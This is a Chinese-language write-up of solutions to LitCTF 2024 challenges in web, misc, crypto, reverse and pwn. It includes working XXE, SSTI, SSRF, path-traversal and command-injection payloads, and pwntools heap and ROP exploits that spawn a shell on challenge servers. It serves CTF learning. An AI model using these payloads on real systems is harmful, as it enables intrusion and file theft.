LitCTF2024部分wp

litctf wp

第一次ak了web和misc,非常激动,感谢lictf给我这个机会

最终成果

在这里插入图片描述

全靠队里的密码逆向✌带飞。一个人就砍了近一半的分数

这里是我们队的wp

web

exx

题目名反过来就是xxe,考察xxe,查看登录的数据包

在这里插入图片描述

发现传的就是xml数据,没过滤啥,基础的payload就出了

import requests
port=28926
username='&xxe;'
data=f"""<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag">]>
<user><username>{username}</username><password>123456</password></user>"""
url=f'http://node2.anna.nssctf.cn:{port}/doLogin.php'
res=requests.post(url=url,data=data)
print(res.text)

在这里插入图片描述

一个池子?

打开环境,看到回声两个字,就猜到是ssti,输入{{3*5}},

在这里插入图片描述

果然就是,本来还想fuzz一下黑名单,联想到xxe没有过滤,用基础payload也是一下就出了

{{lipsum.__globals__.__builtins__.__import__('os').popen('cat /flag').read()}}

SAS

没啥好说,按照他给的代码,写出base64后的对应的序列化数据即可,考反序列化至少也得搞个pop链吧。。。

exp

<?php
class User
{
 public $username='admin';
 public $password='secure_password';

}
echo base64_encode(serialize(new User()));

浏览器也能套娃?

提示输入url,输入个百度的网址,回显了个百度的页面,就是考ssrf,也是没啥过滤,file协议就出了

file:///flag

背景查看器

一开始有个文件包含的提示代码,搞得我以为传url参数,结果没反应,后面发现有个改变主题的按钮,按下后有发送请求

在这里插入图片描述

所以参数是这个theme,也是没啥过滤,首页的代码提示是唬人的,直接目录穿越包含根目录的flag即可

exp

import requests
url='http://node1.anna.nssctf.cn:28117/'
file='../../../../../flag'
data={'theme':file}
res=requests.post(url=url,data=data)
print(res.text)

在这里插入图片描述

百万美元

源码

<?php
error_reporting(0);
$a = $_GET['a'];
$b = $_GET['b'];
$c = $_GET['c'];
if ($a !== $b && md5($a) == md5($b)) {
        if (!is_numeric($c) && $c > 2024) {
            echo "好康的";
        } else {
            die("干巴爹干巴爹先辈~");
        }
    }
else {
    die("开胃小菜))");
}

a 和b很明显传个md5是0e的就行,c传2025a即可,字符串和数字比较会转为数字,2025a转为2025

payload

?a=MMHUWUV&b=MAUXXQC&c=2025a

来到dollar.php

?php
//flag in 12.php
error_reporting(0);
if(isset($_GET['x'])){
    $x = $_GET['x'];
    if(!preg_match("/[a-z0-9;`|#'\"%&\x09\x0a><.,?*\-=\\[\]]/i", $x)){
            system("cat ".$x.".php");
    }
}else{
    highlight_file(__FILE__);
}
?>

ban掉了数字字母,还要构造出12,利用$(())构造出来0 ,取反一下$((~$(())))构造-1,然后把后面多个$((~$(())))像字符串一样拼在一起,shell执行就做减法运算,减到-13,再取反到12即可,

在这里插入图片描述

具体原理可看探机的bash-fuck项目

https://github.com/ProbiusOfficial/bashFuck?tab=readme-ov-file

还有这个大佬的文章也可以看一下

https://xz.aliyun.com/t/12242

payload

?x=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

在这里插入图片描述

misc

贪恋每分每秒

提示很明显了,laosebi 就是lsb,跑个随波逐流即可出flag

在这里插入图片描述

你说的对,但

一开始解压出来的二维码,扫一下转到了云原神,

发现二维码图片里有藏压缩包,foremost提取出来,解压一下发现是一个二维码被拆成了4个部分,还是用随波逐流,方形合并一下得到完整二维码图片,

扫一下就出了flag

LitCTF{Genshin_St@rt!!}

原铁启动

给了个图片

在这里插入图片描述

身为前原神和现星铁玩家,一下字认出了这是原神和星铁里的文字,网上找个对照表就可以出flag

原神:【图研所】提瓦特现行文字对照表-原神社区-米游社 (miyoushe.com) 通用文

星铁:【1.0版本考据】历时两个半月!铁道文字翻译!-原神社区-米游社 (miyoushe.com),

记得换flag头和转小写

LitCTF{good_gamer}

Everywhere we go

就给了一个wav,播放时感觉没啥问题,但我舍友听到了说感觉很奇怪,和原曲差别有点大,可能里面还是藏了东西,尝试用advacity,把采样率改小一点,这里用了1500,打开频谱图,就能看到中间有个flag

在这里插入图片描述

在这里插入图片描述

盯帧珍珠

乍一看是个丁真图片,一打开马上又变成其他的,用stegsolve把每一帧固定住,每帧找一下就能出flag

flag

LitCTF{You_are_really_staring_at_frames!}

舔到最后应有尽有

一打开,是一大堆base64字符串,感觉是base64隐写,puzzlesolver一把梭即可

在这里插入图片描述

LitCTF{TanJi_j1e_jie_n1_dAi_w0_z0u_b_}

太关键了

根据题目名,还有压缩包里的文件名,猜出这是关键词加密,题目提示某些字符频率很高,对keyword.txt里的东西进行词频分析即可出关键词bingo

在这里插入图片描述

然后关键词解密即可

LITCTF{i_miss_you_boss}

女装照流量

流量分析,因为只会看http,所以直接看

看到跟/uplaod/ma.php有很多交互,看看在干什么,找了最后一个来看

在这里插入图片描述

请求是一段很长的php代码,像是蚁剑流量,应答很明显是一个压缩包数据,里面有flag.php,把php代码url解码,格式化一下,得到很长一串,关键部分如下

$F = base64_decode(substr(get_magic_quotes_gpc() ? stripslashes($_POST["p2a4445380b252"]) : $_POST["p2a4445380b252"], 2));
    $fp = @fopen($F, "r");

    if (@fgetc($fp)) {
        @fclose($fp);
        @readfile($F);
    } else {
        echo("ERROR:// Can Not Read");
    }

$F应该就是一个文件的路径,然后readfile读取,根据响应包的内容,这应该是读取压缩包内容的,于是把响应包压缩包内容导出来,解压发现需要密码

然后就往上继续查看ma.php的请求和应答,看到这个时发现

在这里插入图片描述

关键词,adding ,stored,明显是压缩flag.php的命令的回显,所以请求的包一定是压缩的命令,其中应该有密码

于是,把上一个请求的9783流量包的php代码导出来,格式化,得到关键部分如下

$p = base64_decode(substr($_POST["da8af99c22690c"], 2));
$s = base64_decode(substr($_POST["j6d5aaa1b7e5ac"], 2));

然后代码中运行rce用到了p,post的da8af99c22690c参数应该就是命令,解码一下

在这里插入图片描述

得到密码,解压即可得到flag

the love

解压有个图片和wav,wav听起来挺正常的

发现图片中有一个压缩包,分离出来,继续解压发现是真加密,需要密码,一开始爆破了全数字失败,然后010查看图片时发现

在这里插入图片描述

很明显是掩码攻击,apchr跑一下就出了,中间缺失的是202405

压缩包解压后有个假flag,还有一个password.txt,里面的两遍base64后,是

在这里插入图片描述

带密钥的音频隐写,尝试deepsound工具,就出了flag


Crypto

small_e

低指数攻击,n很大,直接开三次方即可

from Crypto.Util.number import *
import math

c_list = [...]

def cubic_root_to_ascii(numbers):
    ascii_chars = []
    for num in numbers:
        for i in range(0, 200):
            if i**3 == num:
                ascii_chars.append(chr(i))
    return ascii_chars

ascii_result = cubic_root_to_ascii(c_list)
print("".join(ascii_result))

small_e_plus

指数依旧比较小,而且可以猜测前几位明文是 LitCTF
爆破出指数,然后解密即可

n = 26287684934288536371438030224508784042871268975402791015134838900290249602701092702492594931306572692868654436714501196060619149020850402317982203575250568283872182497606239389480186694649979877566740647822434500023605871516831662099415987589808614777313595453727243531121031390104059097782466650186291076316486240197369759537327997880644540629964227584070506981319936888159712058406052247256554081989035415864476278146328967410452695134756792942103209740186339835071828587981271027235499355298543650516643100665039796305276163706693873611519506528344413021878980171629732211592839945004800782325172828561339662590291

c_list = [...]

c1 = ord("L")

c = 2206795524649235905421691489826312664535869158473992241382107452229902627430789178221234450699214518235612692491501082306158268745610575202210170312762929300421312081998256557805289595256913161318967687803957784191522197708618872099119883772100567610799038030170491575261415069363292331223848994909959222662307903914818692008641789258455591462146141825906954662346647872459477376830019604449386735009274664469596162731339288162705222622464022019805917855614180415135305122287341306358535204977475464107550060171378721195970927993762052901722822033817371589592984818877687488499315074761849162622037910992107211284008

for i in range(1000, 2000):
    if ((c1**i) % n) == c:
        print(i)
        break

e = 1924

ascii_chars = []
for num in c_list:
    for i in range(0, 200):
        if ((i**e) % n) == num:
            ascii_chars.append(chr(i))
            continue
print("".join(ascii_chars))

真签到

依旧是爆破指数,然后解密

c1 = ord("L")
c = 4124398080749553074619843072966405052653858760437326718059791703345965920503569739252697039258403095781261373084359291436131778873009458422798167842256401087702314540530419434366776728534830888673974354635857270349385440098865230210094489169761588857916363734220665484295067349289289937219722492065728599463
n = 53779688736203933047434881701980151653423802317221115318252054349550528639605402386823698507644560099402835048990108944258111185574422278737617624691459404487383205558495742477348096557609903091073482529108655721238870718736876917084894146112572318162754496404262394399247602930119945411919174294508800616891

for i in range(2, 10**8):
    if pow(c1, i, n) == c:
        print(i)

这里得到 e = 9897777

n = 53779688736203933047434881701980151653423802317221115318252054349550528639605402386823698507644560099402835048990108944258111185574422278737617624691459404487383205558495742477348096557609903091073482529108655721238870718736876917084894146112572318162754496404262394399247602930119945411919174294508800616891
e = 9897777
c = [...]

ascii_chars = []
for num in c:
    for i in range(0, 200):
        if pow(i, e, n) == num:
            ascii_chars.append(chr(i))
            continue
print("".join(ascii_chars))

polynomlal

直接算出pqr,解就完事了

from sympy import symbols, Eq, solve
from Crypto.Util.number import inverse, long_to_bytes

Polynomial1 = 58154360680755769340954893572401748667033313354117942223258370092578635555451803701875246040822675770820625484823955325325376503299610647282074512182673844099014723538935840345806279326671621834884174315042653272845859393720044076731894387316020043030549656441366838837625687203481896972821231596403741150142
Polynomial2 = 171692903673150731426296312524549271861303258108708311216496913475394189393793697817800098242049692305164782587880637516028827647505093628717337292578359337044168928317124830023051015272429945829345733688929892412065424786481363731277240073380880692592385413767327833405744609781605297684139130460468105300760
Polynomial3 = 97986346322515909710602796387982657630408165005623501811821116195049269186902123564611531712164389221482586560334051304898550068155631792198375385506099765648724724155022839470830188199666501947166597094066238209936082936786792764398576045555400742489416583987159603174056183635543796238419852007348207068832

p, q, r = symbols("p q r", integer=True)

eq1 = Eq(p**2 + q, Polynomial1)
eq2 = Eq(q**2 + r, Polynomial2)
eq3 = Eq(r**2 + p, Polynomial3)
solutions = solve((eq1, eq2, eq3), (p, q, r))

if solutions:
    p, q, r = solutions[0]
    print(p)
    print(q)
    print(r)

import libnum
import gmpy2
e = 65537
p = 7625900647186256736313352208336189136024613525845451962194744676052072325262646533642163553090015734584960267587813894745414843037111074258730819958397631
q = 13103163880267648221851617296336865295731278851373488569182099549824826973560296247802058712197255433671825570972129891122274435889696663320490806634737981
r = 9898805297737495640281149403465681435952383402115255751446422784763742395898034378399391604085137196351802539935697155137226495010184322468562791581344399
n = p * q * r
c = 690029769225186609779381701643778761457138553080920444396078012690121613426213828722870549564971078807093600149349998980667982840018011505754141625901220546541212773327617562979660059608220851878701195162259632365509731746682263484332327620436394912873346114451271145412882158989824703847237437871480757404551113620810392782422053869083938928788602100916785471462523020232714027448069442708638323048761035121752395570167604059421559260760645061567883338223699900

phi_n = (p - 1) * (q - 1) * (r - 1)
d = gmpy2.invert(e, phi_n)
m = pow(c, d, n)
print(libnum.n2s(int(m)))

polynomial_plus

升级版多项式,本来是直接用python解多项式方程的,但是跑了半天没跑出来
后来想到用二分查找 k,每次计算区间中间的数与 n 比较,判断是左右哪个区间,一下搞定

from Crypto.Util.number import *

def calculate_p_q(k):
    p = k**10 + 22 * k**8 + 53 * k**6 - 22 * k**4 - 39 * k**2 + 114514
    q = k**9 + 10 * k**7 - 13 * k**6 - 2 * k**4 + 111 * k**2 + 1919810
    return p, q

def binary_search(n):
    low = 0
    high = 2**65
    while low <= high:
        mid = (low + high) // 2
        p, q = calculate_p_q(mid)
        if p * q == n:
            return mid
        elif p * q < n:
            low = mid + 1
        else:
            high = mid - 1
    return None

e = 65537
n = 343424787688946710828788193478518340184635630498236346907606509763011890082198311173501834898393322176325060349656021994088578448585570427399686920253145504431065451412326430233084073651599248661762036671841142048573051549474182586297565046285161375600990596119448538118327240405957845178956427810835797220204485242640945891970398041508724313442375608608662117158013
c = 300097152084696274516003269451037367405899874736667089358316145472977115856239312841307278390995620995063953407731245808077915106161525019835875978698148238617148929170257141762407514139479267867121064342168993486529889088067645866930029787500052390195406519896658384623575160091828173111087120708969655686251340535134778177193882787257773427670338018428731395437974

k = binary_search(n)
p, q = calculate_p_q(k)
d = inverse(e, (p - 1) * (q - 1))
m = pow(c, d, n)

print(long_to_bytes(m))

真easyRSA

刚开始看到题目中有 print(p) print(c),但是输出里没有 p,却有 c1 c2 想不明白
后面重新试着解了一下,原来是有两段

from Crypto.Util.number import *
import gmpy2
n = 111880903302112599361822243412777826052651261464069603671228695119729911614927471127031113870129416452329155262786735889603893196627646342615137280714187446627292465966881136599942375394018828846001863354234047074224843640145067337664994314496776439054625605421747689126816804916163793264559188427704647589521
p = gmpy2.iroot(n, 4)[0]
q = p**3
e = 65537
d = inverse(e, p**3 * (p - 1))
c1 = 78995097464505692833175221336110444691706720784642201874318792576886638370795877665241433503242322048462220941850261103929220636367258375223629313880314757819288233877871049903331061261182932603536690216472460424869498053787147893179733302705430645181983825884645791816106080546937178721898460776392249707560
c2 = 3784701757181065428915597927276042180461070890549646164035543821266506371502690247347168340234933318004928718562990468281285421981157783991138077081303219

print(long_to_bytes(pow(c1, d, n)))
# LitCTF{HeRe_1s_Weak_F1aG}hahahaha_____hint_is_93492332457019255141294502555555489582661562346262162342211605562996217352449
q = 93492332457019255141294502555555489582661562346262162342211605562996217352449
e = 65537
n = p * q
d = inverse(e, (p - 1) * (q - 1))
print(long_to_bytes(pow(c2, d, n)))
# LitCTF{R1ght_Answ3r!}

common_primes

n1,n2 有公因数 p,得到 p 求解即可

from Crypto.Util.number import *

e = 65537
n1 = 63306931765261881888912008095340470978772999620205174857271016152744820165330787864800482852578992473814976781143226630412780924144266471891939661312715157811674817013479316983665960087664430205713509995750877665395721635625035356901765881750073584848176491668327836527294900831898083545883834181689919776769
n2 = 73890412251808619164803968217212494551414786402702497903464017254263780569629065810640215252722102084753519255771619560056118922616964068426636691565703046691711267156442562144139650728482437040380743352597966331370286795249123105338283013032779352474246753386108510685224781299865560425114568893879804036573
c1 = 11273036722994861938281568979042367628277071611591846129102291159440871997302324919023708593105900105417528793646809809850626919594099479505740175853342947734943586940152981298688146019253712344529086852083823837309492466840942593843720630113494974454498664328412122979195932862028821524725158358036734514252
c2 = 42478690444030101869094906005321968598060849172551382502632480617775125215522908666432583017311390935937075283150967678500354031213909256982757457592610576392121713817693171520657833496635639026791597219755461854281419207606460025156812307819350960182028395013278964809309982264879773316952047848608898562420

p = GCD(n1, n2)
q = n1 // p
phi_n = (p - 1) * (q - 1)
d = inverse(e, phi_n)
m = pow(c1, d, n1)
print(long_to_bytes(m))

common_primes_plus

复杂一点的式子,观察一下发现 hint1,hint2 依旧有公因数 p

from Crypto.Util.number import *
n1 = 72619153900682160072296441595808393095979917106156741746523649725579328293061366133340736822282117284050717527134297532031234706715551253283030119063143935874516054785948327252045453986903379262257406260016876625891582923191913450785482873961282498295762698500898694660964018533698142756095427829906473038053
hint1 = 115150932086321440397498980975794957800400136337062771258224890596200580556053305338941267789684878816176014493153795643655219028833232337281425177163963414534998897852644398384446019097451620742463880027107068960452304016955877225140421899265978792650445328111566277376529454404089066088845864500514742797060500618255170627
hint2 = 166820160267525807953634213157298160399912450930658918773153592459310847514047652216110562360456335336533080444219104489314586122760398361430693763814336759476811490524054588094610387417965626546375189720748660483054863693527537614055954695966458622029711055735399842018236940424665041143785192280089418185085532002136215976
c = 28378912671104261862184597375842174085651209464660064937481961814538145807266472966765374317717522401362019901110151858589886717440587644003368826809403188935808872400614919296641885383025657934630410406898092262104442977722339379234085663757182028529198392480656965957860644395092769333414671609962801212632

e = 65537
p = GCD(hint1, hint2)
q = n1 // p
d = inverse(e, (p - 1) * (q - 1))
m = pow(c, d, n1)
print(long_to_bytes(m))

CRT

观察了一下,发现 c_list 中的值都是一样的,说明 e=10 指数较小,直接求 c 的 10 次方根即可

from Crypto.Util.number import *
import gmpy2
c = 644471004204038587358576160407417490938643306027967868486894032686145771114614076076527690366372762614045209015175209880518279715723521182568975220993976451106760236390912778371250746699463366097164369672789316408520079193370191810477580463635224092686607896863852671881543817329521589324466628227730589108339783619357530316049670209743367574983963078106666377633552745384690084183804939047320711873053569717432670155045869610477526046503868585690544254566603491357805849009447674789480061139157433156989123228768899846183291164697221164452100037658563026884070301188916984245139290761779580443049
m = gmpy2.iroot(c, 10)[0]
print(long_to_bytes(m))

little_fermat

p,q 相近,求解 n 的平方根,找相近即可
另外 x 是费马小定理的形式, x = q - 1

from Crypto.Util.number import *
import gmpy2

e = 65537
n = 122719648746679660211272134136414102389555796575857405114496972248651220892565781331814993584484991300852578490929023084395318478514528533234617759712503439058334479192297581245539902950267201362675602085964421659147977335779128546965068649265419736053467523009673037723382969371523663674759921589944204926693
c = 109215817118156917306151535199288935588358410885541150319309172366532983941498151858496142368333375769194040807735053625645757204569614999883828047720427480384683375435683833780686557341909400842874816853528007258975117265789241663068590445878241153205106444357554372566670436865722966668420239234530554168928

root, remainder = gmpy2.iroot(n, 2)
p = 0
q = 0
while True:
    p = n // root
    if p * root == n:
        q = root
        break
    root = root - 1

d = inverse(e, (p - 1) * (q - 1))
m = pow(c, d, n)
m = m ^ (q - 1)
print(long_to_bytes(m))

little_fermat_plus

x 变成了 n 倍的 x,爆破一下就行

from Crypto.Util.number import *
import gmpy2

e = 65537
n = 169522900072954416356051647146585827691225327527086797334523482640452305793443986277933900273961829438217255938808371865341750200444086653241610669340348513884285892043530862971785487294831341653909852543469963032532560079879299447677636753647721541724969084825510405349373420839032990681851700075554428485967
c = 105943762023156641770119141175498496686312095002592803768522760959533958364969985856505466722378959991757667341747887520146437729810252085791886309974903778546814812093444837674447485802109225767800488527376777153844313243366001288246744190001997192598159277512188417272938455513900277907186067996704043274199

root, remainder = gmpy2.iroot(n, 2)
p = 0
q = 0
while True:
    p = n // root
    if p * root == n:
        q = root
        break
    root = root - 1

d = inverse(e, (p - 1) * (q - 1))
m = pow(c, d, n)
print(m)

for i in range(10000):
    am = m ^ (i * (q - 1))
    flag = long_to_bytes(am)
    if b"LitCTF" in flag:
        print(flag)
        break

Reverse

编码喵

看到主程序 base64 加密,然后看字符串
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/
tgL0q1rgEZaZmdm0zwq4lweYzgeTngfHnI1ImMm5ltaXywnLowuYnJmWmx0=
经典换表 base64
在这里插入图片描述

ezpython

python逆向题,用 pyinstxtractor 反编译,然后高版本的 python 无法用本地的 uncompyle6,上网找了个工具
在这里插入图片描述

在这里插入图片描述

又是换表base64
8kuWYm=1JiUPs7DT4x+X5tcqZKfGvA0gFLB6y3QbV2rNOlRdMwnEohjzSe9/HIa-
X=3o4hx=0EZwf=mMv13gX=3o4hx=qje2ZjtgZQmEKXZog4==
在这里插入图片描述

ezrc4

动态调试得到 key = litctf!
用 python 解密即可,注意字符串的大小端转换

def rc4_init(key):
    s = list(range(256))
    j = 0
    k = [key[i % len(key)] for i in range(256)]

    for i in range(256):
        j = (j + s[i] + k[i]) % 256
        s[i], s[j] = s[j], s[i]
        
    return s

def rc4_crypt(data, key):
    s = rc4_init(key)
    i = j = 0
    out = bytearray()

    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        t = (s[i] + s[j]) % 256
        out.append(byte ^ s[t])

    return out

key = b"litctf!"
data = bytearray(
    [
        0xD5,
        0xB2,
        0x7C,
        0xDC,
        0x90,
        0xA2,
        0x6E,
        0x60,
        0x06,
        0x13,
        0xE4,
        0x71,
        0x59,
        0xB0,
        0x90,
        0x31,
        0xB2,
        0xC7,
        0x1D,
        0xD7,
        0x7F,
    ]
)
decrypted_data = rc4_crypt(data, key)
print(decrypted_data.decode("utf-8"))

得到 LitCTF{rc4_love_nice}

Pwn

不得不说,分配的相当清晰,从2.23的fastbin到2.27的tcache bin再到2.31的tcache bin key以及2.35和2.39的IO。从易到难,不过,不得不说,还是警醒我学IO,因为,不会IO,对着例题看了2.35瞪了一下午打不通的眼[躺],对了,加了一道小rop,不过重点在于溢出理解,没有很高的知识要求

heap-2.23

UAF后,可以轻易泄漏出libc基址,然后再通过fastbin attack直接写malloc_hook为one_gadget就行

from pwn import *

 

libc = ELF("./libc.so.6")

\# elf = ELF("./heap")

\# libc = elf.libc

\# io = process("./heap")

io = remote("node2.anna.nssctf.cn", 28852)

 

context(arch = 'amd64', os='linux', terminal='kitty')

\# context.log_level = 'debug'

dbg = lambda: (gdb.attach(io),pause())

lg = lambda n,s: log.info('\033[1;1;20m%s: 0x%x <--\033[0m\033[1;3;20m %s \033[0m' % (str(n), eval(str(s)), s))

 

def choose(choice):

​     io.sendlineafter('>>', str(choice).encode())

 

def alloc(id, size):

  choose(1)

  io.sendlineafter(b'idx?', str(id).encode())

  io.sendlineafter(b'size?', str(size).encode())

 

def delete(id):

  choose(2)

  io.sendlineafter(b'idx?', str(id).encode())

 

def edit(id, content):

  choose(4)

  io.sendlineafter(b'idx?', str(id).encode())

  io.sendlineafter(b'content :', content)def show(id):

  choose(3)

  io.sendlineafter(b'idx?', str(id).encode())

 

alloc(0, 0x90)

alloc(1, 0x10)

 

delete(0)

 

show(0)

 

io.recvuntil(b'content : ')

malloc_hook = u64(io.recv(6).ljust(8, b'\x00')) - 88 - 0x10

lg("malloc_hook", malloc_hook)

libcbase = malloc_hook - libc.sym['__malloc_hook']

lg("libcbase", libcbase)

realloc = libcbase + libc.sym['realloc']

lg("realloc", realloc)

l_gadget = [0x4525a, 0xef9f4, 0xf0897]

r_gadget = [0x4527a, 0xf03a4, 0xf1247]

one_gadget = libcbase + r_gadget[2]

lg("one_gadget", one_gadget)

 

alloc(2, 0x68)

 

delete(2)

edit(2, p64(malloc_hook - 0x23))

 

alloc(3, 0x68)

alloc(4, 0x68)

edit(4, b'A'*0xb + p64(one_gadget) + p64(realloc + 0x8))

 

alloc(5, 0x68)

 

io.interactive()

 
dbg()


heap-2.27

同样的UAF,泄漏后直接tcache double free,写free_hook为system地址,然后free掉包含/bin/sh\x00的堆块就行

from pwn import *

 

libc = ELF("./libc.so.6")

\# elf = ELF("./heap")

\# libc = elf.libc

\# io = process("./heap")

io = remote("node1.anna.nssctf.cn", 28709)

 

context(arch = 'amd64', os='linux', terminal='kitty')

\# context.log_level = 'debug'

dbg = lambda: (gdb.attach(io),pause())

lg = lambda n,s: log.info('\033[1;1;20m%s: 0x%x <--\033[0m\033[1;3;20m %s \033[0m' % (str(n), eval(str(s)), s))



def choose(choice):

     io.sendlineafter('>>', str(choice).encode())

 

def alloc(id, size):

  choose(1)

  io.sendlineafter(b'idx?', str(id).encode())

  io.sendlineafter(b'size?', str(size).encode())

 

def delete(id):

  choose(2)

  io.sendlineafter(b'idx?', str(id).encode())

 

def edit(id, content):

  choose(4)

  io.sendlineafter(b'idx?', str(id).encode())

  io.sendafter(b'content :', content)def show(id):

  choose(3)

  io.sendlineafter(b'idx?', str(id).encode())


alloc(0, 0x410)

alloc(1, 0x10)

delete(0)


show(0)

io.recvuntil(b'content : ')

libcbase = u64(io.recv(6).ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']

lg("libcbase", libcbase)

free_hook = libcbase + libc.sym['__free_hook']

lg("free_hook", free_hook)

l_gadget = [0xe6aee, 0xe6af1, 0xe6af4]

r_gadget = [0xe3afe, 0xe3b01, 0xe3b04]

one_gadget = libcbase + l_gadget[0]

lg("one_gadget", one_gadget)

system = libcbase + libc.sym['system']
lg("system", system)


alloc(2, 0x18)

delete(2)


edit(2, p64(free_hook))

alloc(3, 0x18)
alloc(4, 0x18)
edit(3, b'/bin/sh\x00')

edit(4, p64(system))

delete(3)

io.interactive()

 

dbg()

heap-2.31

UAF再次出击,不仅可以泄漏,还可以清除掉tcache bin检查用的key,然后再次写free_hook(小记一个,2.32才有tcache bin的fd指针加密,我竟然花了十分钟才反应过来,第一个tcache里确实有一个加密用的地址,但是好像没用上,翻笔记才发现2.32才有这机制。。。)

from pwn import *

 

# libc = ELF("./libc.so.6")

elf = ELF("./heap")

libc = elf.libc

io = process("./heap")

# io = remote("node1.anna.nssctf.cn", 28144)

 

context(arch = 'amd64', os='linux', terminal='kitty')

# context.log_level = 'debug'

dbg = lambda: (gdb.attach(io),pause())

lg = lambda n,s: log.info('\033[1;1;20m%s: 0x%x <--\033[0m\033[1;3;20m %s \033[0m' % (str(n), eval(str(s)), s))

 

def choose(choice):

​     io.sendlineafter('>>', str(choice).encode())

 

def alloc(id, size):

  choose(1)

  io.sendlineafter(b'idx?', str(id).encode())

  io.sendlineafter(b'size?', str(size).encode())

 

def delete(id):

  choose(2)

  io.sendlineafter(b'idx?', str(id).encode())

 

def edit(id, content):

  choose(4)

  io.sendlineafter(b'idx?', str(id).encode())

  io.sendafter(b'content :', content)def show(id):

  choose(3)

  io.sendlineafter(b'idx?', str(id).encode())

 

alloc(0, 0x410)

alloc(1, 0x10)

 

delete(0)

 

show(0)

 

io.recvuntil(b'content : ')

libcbase = u64(io.recv(6).ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']

lg("libcbase", libcbase)

free_hook = libcbase + libc.sym['__free_hook']

lg("free_hook", free_hook)

l_gadget = [0xe6aee, 0xe6af1, 0xe6af4]

r_gadget = [0xe3afe, 0xe3b01, 0xe3b04]

one_gadget = libcbase + l_gadget[0]

lg("one_gadget", one_gadget)

system = libcbase + libc.sym['system']

lg("system", system)

 

alloc(2, 0x80)

 

delete(2)

delete(2)

 

edit(2, p64(free_hook))

 

alloc(4, 0x80)

alloc(5, 0x80)

 

edit(5, p64(system))

 

gdb.attach(io)

 

alloc(6, 0x10)

 

edit(6, b'/bin/sh\x00')

 

delete(6)

 

io.interactive()

 

dbg()

 

atm

其实蛮有意思,给了200的溢出距离,但是实际上给了修改函数,3可以增多,2可以减少,不过没用上2,直接不停的给3加0x200(实际上能溢出写进pop_rdi_ret,binsh,ret和system的地址就行了,但是直接就这么写了),只要有了足够长的溢出,就直接执行5泄漏后拿到binsh地址和system地址,然后正常rop,再记一下,有栈平衡问题,会卡住,要加个ret平衡栈,就这样

from pwn import *

from LibcSearcher import *

 

# io = process("./app")

io = remote("node2.anna.nssctf.cn", 28651)

 

elf = ELF("./app")

libc = elf.libc

 

context.terminal = 'kitty'

 

io.sendafter(b'password:', b'A'*0x10)

 

main = elf.sym['main']

 

asi = 1

 

while asi:

  io.sendlineafter(b'4.Exit', b'3')

  io.sendlineafter(b'Please enter your deposit:', str(0x200).encode())

  io.sendlineafter(b'4.Exit', b'1')

  io.recvuntil(b'Your balance is:')

  asb = io.recvuntil(b'$', drop='True')

  if int(asb) > 0x200:

​    asi = 0print(hex(int(asb)))

 

io.sendlineafter(b'4.Exit', b'5')

io.recvuntil(b'gift:')

_addr = int(io.recvline()[:-1], 16)

print(hex(_addr))

libc = LibcSearcher('printf', _addr)

libcbase = _addr - libc.dump('printf')

# libcbase = _addr - libc.sym['printf']

print(hex(libcbase))

system = libcbase + libc.dump('system')

binsh = libcbase + libc.dump('str_bin_sh')

# system = libcbase + libc.sym['system']

# binsh = libcbase + next(libc.search('/bin/sh'))

print(hex(system))

print(hex(binsh))

 

pop_rdi_ret = 0x0000000000401233

 

io.sendline(b'A'*(0x160+8) + p64(pop_rdi_ret) + p64(binsh) + p64(0x000000000040101a) + p64(system) + p64(main))

 

# gdb.attach(io)

 

io.sendlineafter(b'4.Exit', b'4')

 

io.interactive()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/682282.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

华为高斯数据库招聘

西安华为&#xff0c;部门直招数据库开发&#xff0c;测试&#xff0c;维护&#xff0c;hc充足&#xff0c;流程快。 语言不限&#xff0c;专业不限&#xff0c;与业内数据库大佬共事&#xff0c;致力于做数据库行业领军者。 一、岗位职责&#xff1a; 1.负责数据库系统内核模…

Qt信号槽与函数直接调用性能对比

1. 测试方法 定义一个类Recv&#xff0c;其中包含一个成员变量num和一个成员函数add()&#xff0c;add()实现num的递增。 另一个类Send通过信号槽或直接调用的方法调用Recv的add函数。 单独开一个线程Watcher&#xff0c;每秒计算num变量的增长数值&#xff0c;作为add函数被调…

SpaceX 首席火箭着陆工程师 MIT论文详解:非凸软着陆最优控制问题的控制边界和指向约束的无损凸化

上一篇blog翻译了 Lars Blackmore(Lars Blackmore is principal rocket landing engineer at SpaceX)的文章&#xff0c;SpaceX 使用 CVXGEN 生成定制飞行代码,实现超高速机载凸优化。利用地形相对导航实现了数十米量级的导航精度,着陆器在着陆过程中成像行星表面并将特征与机载…

Spring自带定时任务@Scheduled注解

文章目录 1. cron表达式生成器2. 简单定时任务代码示例&#xff1a;每隔两秒打印一次字符3. Scheduled注解的参数3.1 cron3.2 fixedDelay3.3 fixedRate3.4 initialDelay3.5 fixedDelayString、fixedRateString、initialDelayString等是String类型&#xff0c;支持占位符3.6 tim…

用幻灯片讲解C++手动内存管理

用幻灯片讲解C手动内存管理 1.栈内存的基本元素 2.栈内存的聚合对象 3.手动分配内存和释放内存 注意&#xff1a;手动分配内存&#xff0c;指的是在堆内存中。 除非实现自己的数据结构&#xff0c;否则永远不要手动分配内存! 即使这样&#xff0c;您也应该通过std::allocator…

gitlabcicd-k8s部署runner

一.环境信息 存储使用nfs挂载持久化 k8s环境 helm安装 建议helm 3 二.部署gitlab-runner 1.查看gitlab版本 进入容器可通过执行&#xff1a;gitlab-rake gitlab:env:info rootgitlab-647f4bd8b4-qz2j9:/# gitlab-rake gitlab:env:info System information System: Current Us…

重生之 SpringBoot3 入门保姆级学习(14、内容协商基础简介)

